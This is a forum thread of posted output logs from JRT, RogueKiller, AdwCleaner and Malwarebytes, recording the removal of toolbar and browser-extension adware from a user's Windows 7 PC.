  8. blackclaw96

    blackclaw96 TS Rookie Topic Starter

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Junkware Removal Tool (JRT) by Malwarebytes
    Version: 8.0.3 (02.09.2016)
    Operating System: Windows 7 Ultimate x64
    Ran by WELCOME (Administrator) on 14-03-2016 at 17:55:51.60
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




    File System: 30

    Failed to delete: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0PS72R2M (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_st.chatango.com_0.localstorage (File)
    Successfully deleted: C:\Users\WELCOME\AppData\Roaming\8320 (Folder)
    Successfully deleted: C:\Users\WELCOME\AppData\Roaming\opencandy (Folder)
    Successfully deleted: C:\Users\WELCOME\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0PS72R2M (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\WELCOME\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2ES6ZSIS (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\WELCOME\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3BQFRYYE (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\WELCOME\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\41YW7VXN (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\WELCOME\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5MTIL98N (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\WELCOME\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6J48QQ88 (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\WELCOME\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\78CF3HIX (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\WELCOME\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9CG691KH (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\WELCOME\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A8XQX8M3 (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\WELCOME\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\C7A8E2TA (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\WELCOME\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NYWMIW52 (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\WELCOME\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\YNFK1P0N (Temporary Internet Files Folder)
    Successfully deleted: C:\Users\WELCOME\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZOM7WTXT (Temporary Internet Files Folder)
    Successfully deleted: C:\Windows\prefetch\FREEALARMCLOCK.EXE-08D6F59F.pf (File)
    Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2ES6ZSIS (Temporary Internet Files Folder)
    Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3BQFRYYE (Temporary Internet Files Folder)
    Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\41YW7VXN (Temporary Internet Files Folder)
    Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5MTIL98N (Temporary Internet Files Folder)
    Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6J48QQ88 (Temporary Internet Files Folder)
    Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\78CF3HIX (Temporary Internet Files Folder)
    Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9CG691KH (Temporary Internet Files Folder)
    Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A8XQX8M3 (Temporary Internet Files Folder)
    Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\C7A8E2TA (Temporary Internet Files Folder)
    Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NYWMIW52 (Temporary Internet Files Folder)
    Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\YNFK1P0N (Temporary Internet Files Folder)
    Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZOM7WTXT (Temporary Internet Files Folder)



    Registry: 3

    Successfully deleted: HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4} (Registry Key)
    Successfully deleted: HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4} (Registry Key)
    Successfully deleted: HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4} (Registry Value)




    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Scan was completed on 14-03-2016 at 17:59:41.41
    End of JRT log
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
  9. blackclaw96

    blackclaw96 TS Rookie Topic Starter

    RogueKiller V12.0.2.0 [Mar 14 2016] (Free) by Adlice Software
    mail : http://www.adlice.com/contact/
    Feedback : http://forum.adlice.com
    Website : http://www.adlice.com/software/roguekiller/
    Blog : http://www.adlice.com

    Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
    Started in : Normal mode
    User : WELCOME [Administrator]
    Started from : E:\Malware\RogueKiller.exe
    Mode : Delete -- Date : 03/14/2016 18:14:54

    ¤¤¤ Processes : 0 ¤¤¤

    ¤¤¤ Registry : 20 ¤¤¤
    [PUP] (X86) HKEY_LOCAL_MACHINE\Software\SpeedBit -> Deleted
    [PUP] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4} (C:\Program Files (x86)\pandasecuritytb\pandasecurityDx64.dll) -> Deleted
    [PUP] (X64) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar | {B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4} : Panda Security Toolbar (C:\Program Files (x86)\pandasecuritytb\pandasecurityDx64.dll) -> Deleted
    [PUP] (X64) HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\URLSearchHooks | {B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4} : (C:\Program Files (x86)\pandasecuritytb\pandasecurityDx64.dll) -> Deleted
    [PUP] (X86) HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\URLSearchHooks | {B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4} : (C:\Program Files (x86)\pandasecuritytb\pandasecurityDx64.dll) -> ERROR [2]
    [PUP] (X64) HKEY_USERS\S-1-5-21-3006523739-2206101463-1198655294-1000\SOFTWARE\Microsoft\Internet Explorer\URLSearchHooks | {B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4} : (C:\Program Files (x86)\pandasecuritytb\pandasecurityDx64.dll) -> Deleted
    [PUP] (X86) HKEY_USERS\S-1-5-21-3006523739-2206101463-1198655294-1000\SOFTWARE\Microsoft\Internet Explorer\URLSearchHooks | {B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4} : (C:\Program Files (x86)\pandasecuritytb\pandasecurityDx64.dll) -> ERROR [2]
    [PUP] (X64) HKEY_USERS\S-1-5-18\SOFTWARE\Microsoft\Internet Explorer\URLSearchHooks | {B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4} : (C:\Program Files (x86)\pandasecuritytb\pandasecurityDx64.dll) -> ERROR [2]
    [PUP] (X86) HKEY_USERS\S-1-5-18\SOFTWARE\Microsoft\Internet Explorer\URLSearchHooks | {B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4} : (C:\Program Files (x86)\pandasecuritytb\pandasecurityDx64.dll) -> ERROR [2]
    [Suspicious.Path] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunOnce | panda4_0dn_DATA_FOLDER : cmd.exe /c rmdir "C:\ProgramData\Panda Security URL Filtering" /s /q [7][x][x][-][x][x] -> Deleted
    [Suspicious.Path] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunOnce | panda4_0dn_INSTALL_FOLDER : cmd.exe /c rmdir "C:\Windows\system32\config\systemprofile\AppData\Local\panda4_0dn" /s /q [7][x][x][x][x][x] -> Deleted
    [Suspicious.Path] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunOnce | panda4_0dn_DATA_FOLDER : cmd.exe /c rmdir "C:\ProgramData\Panda Security URL Filtering" /s /q [7][x][x][-][x][x] -> ERROR [2]
    [Suspicious.Path] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunOnce | panda4_0dn_INSTALL_FOLDER : cmd.exe /c rmdir "C:\Windows\system32\config\systemprofile\AppData\Local\panda4_0dn" /s /q [7][x][x][x][x][x] -> ERROR [2]
    [Suspicious.Path] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\RunOnce | panda4_0dn_DATA_FOLDER : cmd.exe /c rmdir "C:\ProgramData\Panda Security URL Filtering" /s /q [7][x][x][-][x][x] -> ERROR [2]
    [Suspicious.Path] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\RunOnce | panda4_0dn_INSTALL_FOLDER : cmd.exe /c rmdir "C:\Windows\system32\config\systemprofile\AppData\Local\panda4_0dn" /s /q [7][x][x][x][x][x] -> ERROR [2]
    [Suspicious.Path] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\RunOnce | panda4_0dn_DATA_FOLDER : cmd.exe /c rmdir "C:\ProgramData\Panda Security URL Filtering" /s /q [7][x][x][-][x][x] -> ERROR [2]
    [Suspicious.Path] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\RunOnce | panda4_0dn_INSTALL_FOLDER : cmd.exe /c rmdir "C:\Windows\system32\config\systemprofile\AppData\Local\panda4_0dn" /s /q [7][x][x][x][x][x] -> ERROR [2]
    [Hidden.From.SCM] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\tsusbhub (system32\drivers\tsusbhub.sys) -> Deleted
    [PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-3006523739-2206101463-1198655294-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0 -> Replaced (1)
    [PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-3006523739-2206101463-1198655294-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0 -> Replaced (1)

    ¤¤¤ Tasks : 0 ¤¤¤

    ¤¤¤ Files : 0 ¤¤¤

    ¤¤¤ Hosts File : 0 ¤¤¤

    ¤¤¤ Antirootkit : 0 (Driver: Not loaded [0xc000036b]) ¤¤¤

    ¤¤¤ Web browsers : 1 ¤¤¤
    [PUP][FIREFX:Addon] kesxh4v3.default : Panda Security Toolbar [{B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4}] -> Deleted

    ¤¤¤ MBR Check : ¤¤¤
    +++++ PhysicalDrive0: ST1000DM003-1ER162 ATA Device +++++
    --- User ---
    [MBR] d5bd7dacebf2d312e12c63242945cfc5
    [BSP] 5933824af7494d253b6d5dab8701e3b6 : Windows Vista/7/8|VT.Unknown MBR Code
    Partition table:
    0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 100 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
    1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 204799 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
    2 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 419635200 | Size: 204900 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
    3 - [XXXXXX] EXTEN-LBA (0xf) [VISIBLE] Offset (sectors): 839270400 | Size: 544068 MB
    User = LL1 ... OK
    User = LL2 ... OK

    +++++ PhysicalDrive1: StoreJet Transcend USB Device +++++
    --- User ---
    [MBR] ddf547eb6863598a573c735dc5272951
    [BSP] d04a347e27be8a97381534ecc5425b5c : Windows XP|VT.Unknown MBR Code
    Partition table:
    0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 64 | Size: 953867 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
    User = LL1 ... OK
    Error reading LL2 MBR! ([32] Die Anforderung wird nicht unterstützt. )
     
  10. blackclaw96

    blackclaw96 TS Rookie Topic Starter

    # AdwCleaner v5.102 - Logfile created 14/03/2016 at 18:19:51
    # Updated 13/03/2016 by Xplode
    # Database : 2016-03-14.1 [Server]
    # Operating system : Windows 7 Ultimate Service Pack 1 (x64)
    # Username : WELCOME - DIABLO
    # Running from : E:\Malware\adwcleaner_5.102.exe
    # Option : Clean
    # Support : http://toolslib.net/forum

    ***** [ Services ] *****


    ***** [ Folders ] *****

    [-] Folder Deleted : C:\Program Files (x86)\pandasecuritytb
    [-] Folder Deleted : C:\Program Files (x86)\Common Files\Speedbit
    [-] Folder Deleted : C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk
    [J] Folder Not Deleted : C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk
    [-] Folder Deleted : C:\Users\Guest\AppData\LocalLow\pandasecuritytb
    [-] Folder Deleted : C:\Users\Public\Documents\Speedbit
    [-] Folder Deleted : C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk
    [J] Folder Not Deleted : C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk
    [-] Folder Deleted : C:\Users\WELCOME\AppData\LocalLow\Speedbit
    [-] Folder Deleted : C:\Users\WELCOME\AppData\LocalLow\pandasecuritytb
    [-] Folder Deleted : C:\Users\WELCOME\AppData\Roaming\Mozilla\Firefox\Profiles\kesxh4v3.default\pandasecuritytb

    ***** [ Files ] *****

    [-] File Deleted : C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_mallpejgeafdahhflmliiahjdpgbegpk_0.localstorage
    [#] File Deleted : C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_mallpejgeafdahhflmliiahjdpgbegpk_0.localstorage
    [-] File Deleted : C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_fromdoctopdf.dl.myway.com_0.localstorage
    [-] File Deleted : C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_fromdoctopdf.dl.myway.com_0.localstorage-journal
    [-] File Deleted : C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_fromdoctopdf.dl.tb.ask.com_0.localstorage
    [-] File Deleted : C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_fromdoctopdf.dl.tb.ask.com_0.localstorage-journal
    [-] File Deleted : C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_mallpejgeafdahhflmliiahjdpgbegpk_0.localstorage
    [#] File Deleted : C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_mallpejgeafdahhflmliiahjdpgbegpk_0.localstorage
    [-] File Deleted : C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.tradeadexchange.com_0.localstorage

    ***** [ DLLs ] *****


    ***** [ Shortcuts ] *****


    ***** [ Scheduled tasks ] *****


    ***** [ Registry ] *****

    [-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{61AB12E1-A5FF-11D1-B2E9-444553540000}
    [-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{82351441-9094-11D1-A24B-00A0C932C7DF}
    [-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{3CCC052E-BDEE-408A-BEA7-90914EF2964B}
    [-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{61F47056-E400-43D3-AF1E-AB7DFFD4C4AD}
    [-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{E2B98EEA-EE55-4E9B-A8C1-6E5288DF785A}
    [-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4}
    [-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{6DC82D15-92F2-11D1-A255-00A0C932C7DF}
    [-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{82351433-9094-11D1-A24B-00A0C932C7DF}
    [-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4}
    [-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4}
    [-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{62155D33-3CE2-401E-8967-5A270628A3D5}
    [-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4}
    [-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4}
    [-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{62155D33-3CE2-401E-8967-5A270628A3D5}
    [-] Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4}
    [-] Key Deleted : HKCU\Software\SpeedBit
    [-] Key Deleted : HKLM\SOFTWARE\SpeedBit
    [-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Toolbar Cleaner
    [-] Key Deleted : HKU\.DEFAULT\Software\SpeedBit
    [-] Value Deleted : HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules [{025B1FA6-BEFB-4EA5-B33C-D865EA3B6CE4}]
    [-] Value Deleted : HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules [{BE9D44D5-C882-456E-93EB-E21083969B3C}]

    ***** [ Web browsers ] *****

    [-] [C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Deleted : mallpejgeafdahhflmliiahjdpgbegpk
    [-] [C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Deleted : mallpejgeafdahhflmliiahjdpgbegpk
    [-] [C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Deleted : mallpejgeafdahhflmliiahjdpgbegpk
    [-] [C:\Users\Guest\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Deleted : mallpejgeafdahhflmliiahjdpgbegpk

    *************************

    :: "Tracing" keys removed
    :: Winsock settings cleared

    *************************

    C:\Program Files (x86)\AdwCleaner\AdwCleaner[C1].txt - [5713 bytes] - [14/03/2016 18:19:51]
    C:\Program Files (x86)\AdwCleaner\AdwCleaner[S1].txt - [5676 bytes] - [14/03/2016 18:16:05]

    ########## EOF - C:\Program Files (x86)\AdwCleaner\AdwCleaner[C1].txt - [5899 bytes] ##########
     
  11. blackclaw96

    blackclaw96 TS Rookie Topic Starter

    Malwarebytes Anti-Malware
    www.malwarebytes.org

    Scan Date: 14-03-2016
    Scan Time: 18:30
    Logfile: mbam.txt
    Administrator: Yes

    Version: 2.2.0.1024
    Malware Database: v2016.03.14.03
    Rootkit Database: v2016.03.12.01
    License: Free
    Malware Protection: Disabled
    Malicious Website Protection: Disabled
    Self-protection: Disabled

    OS: Windows 7 Service Pack 1
    CPU: x64
    File System: NTFS
    User: WELCOME

    Scan Type: Threat Scan
    Result: Completed
    Objects Scanned: 440497
    Time Elapsed: 9 min, 12 sec

    Memory: Enabled
    Startup: Enabled
    Filesystem: Enabled
    Archives: Enabled
    Rootkits: Disabled
    Heuristics: Enabled
    PUP: Enabled
    PUM: Enabled

    Processes: 0
    (No malicious items detected)

    Modules: 0
    (No malicious items detected)

    Registry Keys: 0
    (No malicious items detected)

    Registry Values: 0
    (No malicious items detected)

    Registry Data: 0
    (No malicious items detected)

    Folders: 85

    Files: 241
     
  12. blackclaw96

    blackclaw96 TS Rookie Topic Starter

    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\search\html\searchSuggestions.css, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\search\html\searchSuggestions.html, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\search\html\searchSuggestions.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\search\html\searchSuggestionsInit.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\supertab\css\supertab.css, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\supertab\html\supertab.html, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\supertab\js\newtabfork.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\supertab\js\reporting.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\supertab\js\srchsugg.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\supertab\js\supertab.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\supertab\js\unifiedLogging.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\supertab\js\__utm.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\icons\arrowSprite.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\icons\icon128.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\icons\icon16.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\icons\icon19disabled.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\icons\icon19on.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\icons\icon48.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\icons\tb_icon_search_disappearing_ask.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\images\223754507.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\images\223754510.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\images\223754534.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\images\223754535.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\images\223754536.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\images\223754537.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\images\223754551.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\images\down_arrow.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\images\IDR_PRODUCT_LOGO_16.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\images\IDR_WEBSTORE_ICON.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\images\magnifying_glass.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
